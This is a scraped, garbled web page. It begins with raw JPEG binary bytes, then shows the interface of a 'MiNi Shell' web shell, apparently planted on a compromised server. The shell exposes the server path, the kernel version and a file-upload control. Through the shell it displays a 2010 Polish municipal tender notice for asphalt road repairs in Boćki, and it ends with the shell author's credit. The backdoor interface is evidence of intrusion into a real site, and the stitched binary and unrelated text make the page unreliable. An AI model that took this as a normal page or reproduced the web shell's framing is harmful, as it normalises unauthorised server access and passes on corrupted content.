JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100802/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100802/206681-N-2010.html

<p class="kh_header"><b>Boćki: Remont odcinków dróg  polegający na wykonaniu nawierzchni jezdni z betonu asfaltowego  na  drodze: nr geodezyjny 349  o długości 825 mb  t .j. od wsi Siekluki  do drogi gminnej nr 108747 B (Kol Andryjanki -  Żołoćki ) i  w miejscowości Boćki - (ul. Polnej o długości  206 mb  , ul.  Akacjowej o długości 155 mb )</b><br>
<b>Numer ogłoszenia: 206681 - 2010; data zamieszczenia: 02.08.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Boćki , Plac Armii Krajowej 3, 17-111 Boćki, woj. podlaskie, tel. 85 7319610; 7319620, faks 85 7319612.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gminabocki.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont odcinków dróg  polegający na wykonaniu nawierzchni jezdni z betonu asfaltowego  na  drodze: nr geodezyjny 349  o długości 825 mb  t .j. od wsi Siekluki  do drogi gminnej nr 108747 B (Kol Andryjanki -  Żołoćki ) i  w miejscowości Boćki - (ul. Polnej o długości  206 mb  , ul.  Akacjowej o długości 155 mb ).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1/ Remont drogi nr geodezyjny 349  o długości 825 mb ,  t .j. od wsi Siekluki do drogi gminnej nr 108747 B (Kol Andryjanki -  Żołoćki ) 
Parametry techniczne drogi: klasa drogi  D, szerokość jezdni 5,0 m,  kategoria ruchu:   KR 1, szerokość poboczy żwirowe  0,5 m  , spadek poprzeczny poboczy  - 6  %
Konstrukcja i technologia nawierzchni jezdni: konstrukcja nawierzchni dla ruchu KR1 na podłożu G-1 , dla odcinka 0+000 - 0 + 825
- podbudowa z kruszywa naturalnego stabilizowanego mechanicznie grub. 20 cm  ( istniejąca nawierzchnia żwirowa wraz z wyrównaniem pospółką)
- warstwa ścieralna z betonu asfaltowego 0/12,8  wg PN-S-96025:2000  grubości 5 cm 
Odwodnienie: wody opadowe z powierzchni drogi będą odprowadzane grawitacyjnie  powierzchniowo do istniejących rowów przydrożnych - stan dobry.
 Zakres i ilość podstawowych robót : roboty pomiarowe- 0,825 km ,  rozebranie przepustu z rur żelbetonowych pod koroną drogi  - 1 m i wykonanie części przelotowej przepustu  z rur żelbetonowych O60 - 2 m wraz z wykonaniem  ścianki czołowej przepustu z betonu B-30 - 2,66 m3 ;  wykonanie podbudowy z kruszywa naturalnego stabilizowanego mechanicznie grubości 25 cm na poszerzeniu - 179 m2 , wyrównanie istniejącej nawierzchni kruszywem naturalnym  stabilizowanym mechanicznie - 422 m3,  wykonanie nawierzchni z betonu asfaltowego 0/12,8 mm - warstwa ścieralna grubości 5 cm -  4337 m2

2/  Remont ulicy Polnej w m Boćki o długości 206 mb  
Parametry techniczne drogi: Klasa drogi  D, szerokość jezdni 5m, kategoria ruchu:   KR 2, szerokość poboczy  0,5 m, spadek poprzeczny poboczy  - 6  %, spadki poprzeczne jezdni: daszkowy 2% na całym odcinku od km 0+000 - 0+206, zjazdy żwirowe w granicach pasa drogowego.
Konstrukcja i technologia nawierzchni jezdni: konstrukcja nawierzchni dla ruchu KR1 na podłożu G-1 dla całego odcinka
- podbudowa z kruszywa naturalnego stabilizowanego  mechanicznie grubości 20 cm ( istniejąca nawierzchnia żwirowa + wyrównawcza)
- warstwa wiążąco - wyrównawcza z  betonu asfaltowego  wg PN-S-96025:2000 grub. 5cm.
Odwodnienie: wody opadowe z powierzchni  drogi będą odprowadzane grawitacyjnie powierzchniowo w kierunku pól 
Zakres i ilość  podstawowych robót : roboty pomiarowe - 0,206 km ; wykonanie wykopów 52 m3 ; wykonanie podbudowy z kruszywa naturalnego stabilizowanego mechanicznie  grubości 20 cm - poszerzenie podbudowy  - 51 m3 ; wyrównanie podbudowy kruszywem naturalnym stabilizowanym mechanicznie  - 39 m3 wykonanie nawierzchni z betonu asfaltowego 0/12,8 mm- warstwa ścieralna  grubości 5 cm - 1030 m2 ; wykonanie nawierzchni żwirowych na zjazdach  gr. 15 cm- 17,5 m 2 ; regulacja studzienek kanalizacyjnych - 4 szt. 

3/ Remont odcinka ulicy Akacjowej w miejscowości Boćki o długości 155 mb t. j. od. km 0 + 810 do  km 0+ 965  -  granica pasa drogi kr 19
Parametry techniczne drogi: klasa drogi D, szerokość jezdni 4,5m na długości 140 mb w /w odcinka i szerokość jezdni 5,0 m na długości 15 m w / w odcinka, kategoria ruchu : KR 1, szerokość poboczy  żwirowe 0,5 m, spadki poprzeczne poboczy 6 %, spadek poprzeczny jezdni : daszkowy 2 %, zjazdy żwirowe w granicy pasa drogowego
Konstrukcja i technologia nawierzchni jezdni
a)na istniejącej nawierzchni żwirowej warstwa  wyrównawczo wzmacniająca z kruszywa naturalnego stabilizowanego mechanicznie 
b)warstwa wiążąca z betonu asfaltowego  0/12.8 mm grubości 5,0 cm
c)warstwa ścieralna  z betonu asfaltowego  0/ 12,8 mm , grubości 4,0 cm
Odwodnienie - powierzchniowy spływ wód  do istniejących cieków wodnych  i kratki ściekowej w km 0+ 819 w ramach polepszenia  odprowadzenia wód  z korpusu drogi  w km 0+ 815  należy wykonać  studnię z rur betonowych O 80 cm z bocznym wlotem wody i połączeniem przykanalikiem  z istniejącą kratką ściekową w km 0+ 819.
Zakres i ilość podstawowych robót : roboty pomiarowe - 0,155 km ; roboty ziemne - wykonanie wykopów - 90,4 m3; wykonanie studni chłonnej z rur O 80 cm z boczną kratką ściekową i osadnikiem - 1 szt.  ułożenie przykanalika z rur PCV O 20 cm - 12 m ;wykonanie podbudowy z kruszywa naturalnego stabilizowanego mechanicznie grubości 30 cm na poszerzeniu podbudowy - 390 m2 ; wyrównanie podbudowy kruszywem naturalnym stabilizowanym mechanicznie - 70 m3 ; wykonanie nawierzchni z betonu asfaltowego 0/12,8 mm - warstwa wiążąca grubości 5 cm KR-1 - 786 m2 ; mechaniczne oczyszczenie i skropienie emulsją warstwy wiążącej przed ułożeniem warstwy ścieralnej - 786 m2 ; wykonanie nawierzchni  z betonu asfaltowego 0/12,8 - warstwa ścieralna  grubości 4 cm   KR-1 - 764,4 m2 , wykonanie nawierzchni żwirowych  gr. 20 cm na zjazdach- 28 m2; regulacja studzienek  kanalizacyjnych - 4 szt. ; regulacja studzienki ściekowej  O 50 wraz z wymianą kratki ściekowej - 1 szt.
 
Szczegółowy opis przedmiotu zamówienia określają dokumentacje projektowe i przdmiary robót.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.42-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 08.10.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> W niejszym postępowaniu Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymagane jest wykonanie w okresie ostatnich pięciu lat a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie, minimum 1 roboty budowlanej polegającej na wykonaniu nawierzchni z asfaltobetonu o powierzchni nie mniejszej niż 3500 m2;
w przypadku składania oferty przez wykonawców występujących wspólnie ww. warunek musi spełnić co najmniej jeden z wykonawców.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymagane jest dysponowanie minimum 1 osobą posiadającą uprawnienia do kierowania robotami budowlanymi w specjalności drogowej; w przypadku składania oferty przez wykonawców występujących wspólnie  ww. warunek musi spełnić co najmniej jeden  z wykonawców.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wypełniony formularz OFERTA, pełnomocnictwo do reprezentowania Wykonawcy o ile ofertę składa pełnomocnik, dokumenty i oświadczenia wyszczególnione w punkcie 7 SIWZ, kosztorysy ofertowe.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z art. 144 ustawy Pzp Zamawiający przewiduje możliwość dokonania zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy określając następujące warunki zmiany:
- w przypadku wystąpienia niekorzystnych warunków atmosferycznych powodujących konieczność przerwania robót, zamawiający dopuszcza możliwość przedłużenia terminu przewidzianego na realizację zamówienia, o ilość dni w których te warunki wystąpią, 
- wystąpienie siły wyższej, mającej bezpośredni wpływ na termin wykonania robót ( np. klęski żywiołowe), 
- w przypadku wystąpienia nieprzewidzianych robót, mających wpływ na prawidłowe wykonanie przedmiotu umowy, których realizacja powoduje konieczność przedłużenia terminu umowy podstawowej; Zamawiający dopuszcza możliwość przedłużenia tego terminu, o okres niezbędny do realizacji w/w robót, 
- wystąpienie poważnych rozbieżności między dokumentacją projektową a stanem rzeczywistym w terenie, powodujących konieczność wstrzymania robót, 
- zmiany technologii robót, materiałów lub urządzeń przewidzianych w dokumentacji związane z postępem technicznym, w ramach dotychczasowego wynagrodzenia, 
- zwiększenie lub zmniejszenie wynagrodzenia umownego wynikające z rozliczenia   kosztorysowego robót zamówionych, 
- zmiana personelu Wykonawcy lub Zamawiającego, 
- zmiana części zamówienia, którą wykonują podwykonawcy, 
- wprowadzenie podwykonawcy, w przypadku braku możliwości wykonania roboty siłami własnymi.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.gminabocki.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Boćki ul. Plac Armii Krajowej 3, pokój nr 18.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.08.2010 godzina 10:00, miejsce: Urząd Gminy Boćki ul. Plac Armii Krajowej 3, sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com